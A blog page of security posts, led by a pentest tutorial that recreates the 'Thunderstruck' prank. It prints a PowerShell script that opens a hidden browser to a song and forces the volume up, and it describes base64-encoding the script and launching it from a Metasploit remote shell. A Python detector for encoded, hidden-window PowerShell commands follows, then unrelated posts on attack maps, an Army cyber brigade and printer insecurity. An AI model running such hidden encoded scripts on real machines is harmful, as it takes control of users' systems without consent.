Recreating Iran AC/DC Thunderstruck Worm with PowerShell & Metasploit


About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no-no, so don’t do it. Actually using this against any system that you do not have express written permission to test will probably land you in jail, so again, don’t do it. Lastly, this is not new; it is from a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code to play AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbell. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check this out:

The code can be found at his Github site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly, we will need a willing Windows 7 system as a target. This attack did not seem to work very well using a VMware virtual machine as the target (the volume-up loop seems to bog systems down pretty good), so I used a stand-alone system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

```powershell
[string] $VideoURL = "http://www.youtube.com/watch?v=v2AC41dglnM"
# Create hidden IE COM object and navigate it to the video
$IEComObject = New-Object -com "InternetExplorer.Application"
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
# Run the loop for the length of the song (3 minutes)
$EndTime = (Get-Date).addminutes(3)
Write-Verbose "Loop will end at $EndTime"
# ghetto way to do this but it basically presses volume up to raise volume in a loop for 3 minutes
do {
    $WscriptObject = New-Object -com wscript.shell
    $WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)
```

The $VideoURL string sets the song, which is, of course, Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False line tells PowerShell to hide the IE window so that it does not show up. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) in which the Volume Up key (char 175) is sent repeatedly. As mentioned earlier, this loop seems to really bog down the target computer, so you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt”.

3. Base64 encode the script:

(Screenshot: Iran Thunderstruck 2)

And that is it. Now all we need to do is use Metasploit to get a remote shell on the target system and then call the encoded script from our remote shell using PowerShell, like so:

(Screenshot: Iran Thunderstruck 3)

After a short pause the remote target system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn down the volume using the speaker icon, the script fights them by turning it back up until the song is over!

(Screenshot: Iran Thunderstruck 4)

Defending against this attack

The bad thing about PowerShell based attacks is that most anti-virus programs, and Windows itself, do not see them as malicious. So your best bet is to never, ever open unsolicited attachments you receive on social media sites or via e-mail. Also, run script blocking programs to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!
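For the defending side, here is an added example of my own (not code from the post or from obscuresec’s script). It pulls the -EncodedCommand argument out of a process-creation command line as a Sysmon or 4688 log would record it, decodes it the way PowerShell does (base64 of UTF-16LE text), and flags the hidden-IE-plus-SendKeys pattern the script above relies on. The log line is constructed here from the post’s own script; the indicator names are my own.

```python
import base64
import re

# Constructed sample: the post's script, UTF-16LE encoded and base64'd,
# which is the form PowerShell's -EncodedCommand switch expects.
SCRIPT = (
    '$IEComObject = New-Object -com "InternetExplorer.Application"\n'
    '$IEComObject.visible = $False\n'
    'do { $WscriptObject = New-Object -com wscript.shell\n'
    '$WscriptObject.SendKeys([char]175) } until ((Get-Date) -gt $EndTime)'
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
)

# Each pattern alone is benign; together they are the hidden browser plus
# volume-up loop behaviour described in the post.
INDICATORS = {
    "hidden_ie_com": re.compile(r"InternetExplorer\.Application", re.I),
    "invisible_window": re.compile(r"\.visible\s*=\s*\$False", re.I),
    "wscript_shell": re.compile(r"wscript\.shell", re.I),
    "sendkeys_volume_up": re.compile(r"SendKeys\(\[char\]175\)", re.I),
}


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand,
    else None. PowerShell accepts any unambiguous prefix of the switch name
    (-e, -ec, -enc, ...), so match on prefix rather than the full spelling."""
    argv = cmdline.split()
    for i, arg in enumerate(argv[:-1]):
        a = arg.lower()
        if a.startswith("/"):
            a = "-" + a[1:]
        if len(a) >= 2 and "-encodedcommand".startswith(a):
            try:
                raw = base64.b64decode(argv[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(cmdline):
    """Names of the indicators the decoded script hits; [] means nothing to flag."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Run it over the CommandLine field of your process-creation events; any hit on all four indicators at once is worth a look even when the script itself is as harmless as a song.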


Watching Chinese Cyber Attacks against US as they Happen

(Screenshot: Cyber Attack 4)

I just happened to be up very early this morning and caught some of the chatter on Twitter about massive incoming cyber attacks against the US. So I pulled up the Live Attack map from Norse to check it out and saw the amazing image above.

From what I have seen, America and China are usually fairly even in the attack origins category. But this morning there just seemed to be a flood of attacks from China being recorded by the Norse honeypot systems in St. Louis.

It is stunning that the image represents just a fraction of the real-world attacks that are happening at any moment.


US Army Activates “Cyber Protection Brigade”


On Friday the US Army activated what it is calling a “Cyber Protection Brigade”.

According to a post on Army.mil’s website:

“The Army is activating a Cyber Protection Brigade today, and discussing a new cyber branch that could be established as early as next month.

Command Sgt. Maj. Rodney D. Harris, Army Cyber Command, said the branch announcement could come as early as the second week of October, during the Association of the U.S. Army’s annual meeting.

The Cyber Protection Brigade is being activated by the U.S. Army Network Enterprise Technology Command at Fort Gordon, Georgia. It’s the first brigade of its kind in the Army and the nucleus of the new unit will be its cyber protection teams, according to the command.”

The cyber soldiers who are highly trained by the military will help defend the Army’s systems, but will also include offensive strike teams.

“The cyber teams will be roughly platoon-sized, but vary depending on their mission. The combat-mission or offense teams are larger, Harris said. The network defense or cyber-protection teams are mid-size.”

The Army may create a new cyber branch next month. It can take up to three years to train an NCO cyber leader, making it one of the longest training cycles. And with computer attacks increasing every day, the Army is focusing on obtaining and retaining troops who have cyber skills.


Web Enabled Printer (In)Security


In the name of simplicity, it seems like every device is “Web Enabled” now. But the question is, where is the security? I was always stunned at how many printers you can find completely open on the web through Shodan. I never understood why, until now.

I was setting up a brand new “web enabled” printer. It went great: the quick start guide walked me through installing the ink cartridges, and had a great video on connecting the paper trays to the printer and how to correctly insert paper.

It even walked me through turning on networking and getting it connected to my Wireless network.

In no time I was up and running!

It wanted to turn on printing from the internet, got an e-mail address from the web all by itself and then wanted to turn on additional apps. It was so helpful!

But then I wondered, how is this thing secured?!?

So I surfed to the IP address the printer had been assigned, and it had a beautiful web control interface for the printer. That was completely unsecured…

I dug through the menus and finally found the option to turn Web Based security to “On” and put in an administrator password. It informed me that this would not block internet users from seeing everything, but would limit them to informational pages only.

Then I realized, it never prompted me to turn control panel security on, and never asked me for a password. So I dug through the included manual (instead of just browsing the quick start guide) thinking I missed something.

Everything was in the manual, including troubleshooting network connectivity. But nowhere did it mention turning security on or how to even do it!

It’s just a printer you say – But printers can leak some very important information, like internal network settings, logs, files and in some cases, even user accounts.

And a few quick keyword searches on Shodan turn up tens of thousands of insecure printers.

Yikes!

Last month the author of “Shodan Blog” wrote a great article on printers bleeding information publicly.

Titled “I Know You Need Toner”, it lists the printers worldwide that are currently in need of toner:

(Screenshot: Need Toner)

It also shows the number of printers that need toner by country, and a list of the top organizations that need to change their toner.

Cute, I know, but it should really be a warning to people about what information is being bled publicly through the horde of web enabled devices that we are putting throughout our organizations.

It took several years, but most router manufacturers now ship new routers with some level of security turned on. It looks like other web enabled devices (like printers) need to start doing this too!